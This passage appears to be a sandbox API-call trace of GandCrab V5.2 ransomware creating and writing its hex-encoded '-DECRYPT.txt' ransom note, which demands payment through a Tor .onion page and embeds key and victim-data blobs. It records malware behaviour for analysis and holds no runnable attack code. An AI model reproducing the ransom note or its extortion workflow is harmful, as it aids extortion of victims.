pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0094.077] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0094.078] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0094.078] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0094.078] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0094.078] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.078] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.078] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\\\TITWMVJL-DECRYPT.txt") returned 81 [0094.078] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\dp__bieng9\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0094.090] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0094.090] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, 